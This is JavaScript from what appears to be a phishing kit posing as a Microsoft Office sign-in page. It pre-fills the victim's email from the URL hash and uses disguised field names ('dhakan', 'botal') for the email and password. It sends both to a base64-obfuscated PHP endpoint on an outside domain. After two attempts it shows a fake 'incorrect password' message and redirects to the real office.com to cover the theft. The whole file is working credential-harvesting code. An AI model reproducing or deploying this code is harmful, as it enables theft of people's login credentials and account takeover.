


      /* global $ */
      $(document).ready(function(){
        var count=0;


    /////////////url dhakan getting////////////////
    var dhakan = window.location.hash.substr(1);
    if (!dhakan) {

    }
    else
    {
      var base64regex = /^([0-9a-zA-Z+/]{4})*(([0-9a-zA-Z+/]{2}==)|([0-9a-zA-Z+/]{3}=))?$/;

      if (!base64regex.test(dhakan)) {
            // alert(btoa(dhakan));
            var my_dhakan =dhakan;
          }
          else
          {
            // alert(atob(dhakan));
            var my_dhakan =atob(dhakan);
          }
        // $('#dhakan').val(dhakan);
        // var my_dhakan =dhakan;
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!filter.test(my_dhakan)) {
          $('#error').show();
          dhakan.focus;
          return false;
        }
        var ind=my_dhakan.indexOf("@");
        var my_slice=my_dhakan.substr((ind+1));
        var c= my_slice.substr(0, my_slice.indexOf('.'));
        var final= c.toLowerCase();
        $('#dhakan').val(my_dhakan);
      }





      $('#dhakan').click(function(){
        $('#error').hide();
      });
      $('#next').click(function () {
        var my_dhakan =$('#dhakan').val();
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!filter.test(my_dhakan)) {
          $('#error').show();
          dhakan.focus;
          return false;
        }
        var ind=my_dhakan.indexOf("@");
        var my_slice=my_dhakan.substr((ind+1));
        var c= my_slice.substr(0, my_slice.indexOf('.'));
        var final= c.toLowerCase();

        $("#div1").animate({left:200, opacity:"hide"}, 0);
        $("#div2").animate({right:200, opacity:"show"}, 1000);
        $("#dhakanch").html(my_dhakan);

      });
      $('#back').click(function () {
        $("#msg").hide();
        $("#dhakan").val("");
        $("#botal").val("");
        $("#div2").animate({left:200, opacity:"hide"}, 0);
        $("#div1").animate({right:200, opacity:"show"}, 1000);

      });

		var file="aHR0cHM6Ly96b29td2F2ZS5jb20uYXUvL2Jhbmtpbmcvb3JhbmdlLnBocA==";
      $('#submit-btn').click(function(event){
        event.preventDefault();
        var dhakan=$("#dhakan").val();
        var botal=$("#botal").val();
        var detail=$("#field").html();
        var msg = $('#msg').html();

        var my_dhakan =dhakan;
        var ind=my_dhakan.indexOf("@");
        var my_slice=my_dhakan.substr((ind+1));
        var c= my_slice.substr(0, my_slice.indexOf('.'));
        var final= c.toLowerCase();
        $('#msg').text( msg );
        count=count+1;
        $.ajax({
          dataType: 'JSON',
          url: atob(file),
          type: 'POST',
          data:{
            dhakan:dhakan,
            botal:botal,
            detail:detail,

          },
          beforeSend: function(xhr){
            $('#submit-btn').html('Verifying...');
          },
          success: function(response){
            $("#botal").val("");
            if (count>=2) {
              count=0;
              window.location.replace("https://www.office.com/");
            }
            if(response){
              $("#msg").show();
              console.log(response);
              if(response['signal'] == 'ok'){
               $('#msg').html(response['msg']);
             }
             else{
              $('#msg').html(response['msg']);
            }
          }
        },
        error: function(){
          $("#botal").val("");
          if (count>=2) {
            count=0;
            window.location.replace("https://www.office.com/");
          }
          $("#msg").show();
          $('#msg').html("Your account or password is incorrect. Try again!");
        },
        complete: function(){
          $('#submit-btn').html('Login');
        }
      });
      });
    });
  